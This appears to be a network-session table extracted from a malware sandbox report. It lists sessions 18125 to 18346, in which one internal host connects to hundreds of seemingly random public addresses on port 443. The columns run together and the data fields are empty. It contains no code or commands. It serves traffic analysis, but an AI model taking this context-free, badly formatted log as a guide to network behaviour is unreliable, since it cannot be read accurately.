                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18125192.168.2.2337490106.72.237.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18126192.168.2.234031878.196.61.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18127192.168.2.2343896184.53.20.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18128192.168.2.233367082.104.78.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18129192.168.2.2345408112.95.249.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18130192.168.2.2355458206.90.227.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18131192.168.2.2344776133.108.102.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18132192.168.2.234557077.225.44.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18133192.168.2.2337418194.226.114.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18134192.168.2.2351148166.159.43.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18135192.168.2.235494844.65.3.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18136192.168.2.2334568169.83.118.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18137192.168.2.23585482.22.238.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18138192.168.2.2351738194.50.16.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18139192.168.2.2348904134.71.75.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18140192.168.2.235879618.160.128.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18141192.168.2.234741286.69.122.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18142192.168.2.2356450187.213.74.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18143192.168.2.233332257.192.42.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18144192.168.2.2350902102.49.218.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18145192.168.2.235708873.218.97.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18146192.168.2.233351689.122.49.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18147192.168.2.234260494.116.93.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18148192.168.2.2353190206.53.178.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18149192.168.2.235395076.108.109.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18150192.168.2.235942898.149.239.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18151192.168.2.235146432.180.80.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18152192.168.2.234626680.208.155.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18153192.168.2.2345262212.11.40.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18154192.168.2.2351514163.5.87.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18155192.168.2.234685649.121.91.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18156192.168.2.233426241.28.160.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18157192.168.2.2344882131.34.216.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18158192.168.2.2337448185.101.153.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18159192.168.2.235449285.179.229.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18160192.168.2.2348454133.74.129.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18161192.168.2.2352540152.204.175.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18162192.168.2.234488873.104.39.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18163192.168.2.236081888.213.221.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18164192.168.2.235352084.52.148.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18165192.168.2.2351370218.209.54.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18166192.168.2.2344898174.102.151.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18167192.168.2.23384741.99.175.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18168192.168.2.235219057.73.106.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18169192.168.2.2359852169.91.40.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18170192.168.2.234421668.250.75.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18171192.168.2.2357158217.99.170.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18172192.168.2.235436039.156.81.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18173192.168.2.234529013.71.34.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18174192.168.2.233738473.110.136.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18175192.168.2.2343048178.45.239.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18176192.168.2.235345250.91.242.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18177192.168.2.2360970213.196.198.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18178192.168.2.233650095.129.55.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18179192.168.2.233451457.226.70.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18180192.168.2.2340684203.97.35.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18181192.168.2.234675681.102.218.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18182192.168.2.2358832101.105.51.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18183192.168.2.2337772110.67.205.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18184192.168.2.2344194102.188.2.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18185192.168.2.2345416108.154.13.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18186192.168.2.23423368.117.21.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18187192.168.2.2334620182.64.133.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18188192.168.2.2346890107.53.243.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18189192.168.2.2341462202.48.166.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18190192.168.2.233735623.225.171.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18191192.168.2.235073298.100.226.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18192192.168.2.236059827.148.186.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18193192.168.2.2334338147.242.97.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18194192.168.2.2344482159.102.25.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18195192.168.2.235438865.51.92.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18196192.168.2.2356410125.205.175.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18197192.168.2.2356108186.192.36.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18198192.168.2.233297294.125.101.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18199192.168.2.234152217.44.47.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18200192.168.2.236074691.170.152.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18201192.168.2.235511458.151.177.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18202192.168.2.2339270163.129.86.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18203192.168.2.2360460211.198.155.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18204192.168.2.2360766120.220.120.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18205192.168.2.2357088209.101.71.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18206192.168.2.2339004223.219.142.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18207192.168.2.2352950101.203.159.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18208192.168.2.2357144146.231.118.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18209192.168.2.234401849.52.251.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18210192.168.2.2347854194.26.110.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18211192.168.2.23570068.173.76.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18212192.168.2.2351322117.125.8.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18213192.168.2.233374813.195.198.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18214192.168.2.234066257.124.176.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18215192.168.2.233816647.173.187.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18216192.168.2.2338918119.20.214.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18217192.168.2.2336026192.17.24.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18218192.168.2.2343134146.80.249.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18219192.168.2.234483613.149.241.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18220192.168.2.2339156106.23.189.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18221192.168.2.2359802150.118.240.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18222192.168.2.236082831.143.148.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18223192.168.2.2341346197.208.246.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18224192.168.2.233289836.8.199.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18225192.168.2.2351202150.83.48.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18226192.168.2.234827449.171.220.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18227192.168.2.2346748160.41.251.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18228192.168.2.233639414.154.100.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18229192.168.2.235945262.79.222.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18230192.168.2.2347150112.134.183.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18231192.168.2.2356522136.254.208.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18232192.168.2.2335232104.236.137.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18233192.168.2.235600483.11.4.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18234192.168.2.235602081.117.148.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18235192.168.2.2347540156.106.142.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18236192.168.2.2340554183.133.59.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18237192.168.2.233543232.20.165.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18238192.168.2.234352641.19.121.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18239192.168.2.2358998148.189.51.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18240192.168.2.234660241.162.189.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18241192.168.2.2340684218.85.1.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18242192.168.2.2346538102.221.242.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18243192.168.2.2347582105.210.96.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18244192.168.2.2349432197.235.38.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18245192.168.2.234102471.87.176.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18246192.168.2.2337842123.27.27.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18247192.168.2.2334976196.17.184.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18248192.168.2.23489928.65.77.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18249192.168.2.2349842182.77.80.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18250192.168.2.234589470.1.122.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18251192.168.2.2336098171.27.250.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18252192.168.2.2343440206.80.167.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18253192.168.2.2353436154.82.244.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18254192.168.2.2336410176.181.124.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18255192.168.2.236076271.174.152.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18256192.168.2.2340318222.76.87.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18257192.168.2.235546441.128.80.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18258192.168.2.2345132119.18.184.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18259192.168.2.23509424.174.124.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18260192.168.2.2345826163.0.161.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18261192.168.2.2357024141.232.169.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18262192.168.2.2357774141.230.115.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18263192.168.2.235949836.34.228.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18264192.168.2.2355642161.245.189.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18265192.168.2.2349222176.106.165.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18266192.168.2.234870057.65.123.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18267192.168.2.2340968206.95.146.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18268192.168.2.235661297.239.7.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18269192.168.2.2345774210.254.184.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18270192.168.2.2334174184.8.46.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18271192.168.2.235667857.241.121.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18272192.168.2.233980694.73.200.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18273192.168.2.234986880.212.83.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18274192.168.2.2350048148.235.137.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18275192.168.2.2340516135.54.80.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18276192.168.2.234694847.216.179.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18277192.168.2.233344889.14.139.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18278192.168.2.233918841.224.82.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18279192.168.2.235005231.116.48.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18280192.168.2.234923675.82.215.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18281192.168.2.2341760190.94.79.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18282192.168.2.2360162107.252.71.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18283192.168.2.235099088.40.215.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18284192.168.2.234238070.234.250.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18285192.168.2.235694853.40.3.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18286192.168.2.233745487.67.199.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18287192.168.2.2357896131.3.71.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18288192.168.2.2356112179.169.251.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18289192.168.2.2355940180.109.158.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18290192.168.2.2357142216.187.33.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18291192.168.2.235978859.241.191.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18292192.168.2.2356714142.200.247.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18293192.168.2.2343582147.118.68.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18294192.168.2.2336398206.13.117.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18295192.168.2.2357784177.92.129.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18296192.168.2.233627645.97.57.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18297192.168.2.2353138134.88.144.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18298192.168.2.235096646.147.100.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18299192.168.2.2333788140.133.176.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18300192.168.2.2359966109.59.109.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18301192.168.2.2344416208.184.109.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18302192.168.2.234919877.48.238.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18303192.168.2.2350108223.213.35.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18304192.168.2.2345760218.64.19.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18305192.168.2.2338652115.134.154.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18306192.168.2.2339636190.65.93.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18307192.168.2.2353164176.90.244.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18308192.168.2.2342972201.211.236.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18309192.168.2.2341418119.116.148.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18310192.168.2.2342114131.147.238.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18311192.168.2.235498264.155.95.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18312192.168.2.23353085.194.117.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18313192.168.2.235973471.182.10.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18314192.168.2.235913286.130.104.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18315192.168.2.235393691.14.174.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18316192.168.2.235748220.220.113.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18317192.168.2.2345698200.111.43.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18318192.168.2.2345116103.180.31.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18319192.168.2.233328667.241.85.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18320192.168.2.2335626121.61.229.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18321192.168.2.234465836.75.18.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18322192.168.2.234377239.60.173.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18323192.168.2.2353528219.223.195.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18324192.168.2.234772018.144.218.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18325192.168.2.236005832.147.45.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18326192.168.2.234037457.252.33.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18327192.168.2.2357452102.57.156.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18328192.168.2.2357602158.204.162.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18329192.168.2.2338214208.99.76.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18330192.168.2.2342334174.191.179.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18331192.168.2.2348194217.38.100.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18332192.168.2.2358816126.129.217.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18333192.168.2.2354478108.40.69.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18334192.168.2.2355692175.153.96.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18335192.168.2.2342860111.84.131.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18336192.168.2.2350940134.58.186.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18337192.168.2.2348862184.98.182.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18338192.168.2.233470085.252.225.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18339192.168.2.2343864135.82.77.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18340192.168.2.234503088.212.243.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18341192.168.2.2334180137.16.120.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18342192.168.2.233609412.112.178.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18343192.168.2.2337082182.18.207.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18344192.168.2.235837063.251.216.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18345192.168.2.235639684.121.5.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18346192.168.2.233989451.107.90.241443
